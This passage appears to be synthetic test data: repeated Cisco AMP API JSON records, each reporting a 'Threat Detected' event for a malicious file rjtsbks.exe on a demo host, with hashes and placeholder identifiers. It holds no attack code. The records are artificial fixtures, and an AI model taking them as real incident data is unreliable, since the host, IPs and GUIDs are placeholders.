Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":598000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":582000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":551000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":535000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":520000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163593","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163592","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":442000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163591","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 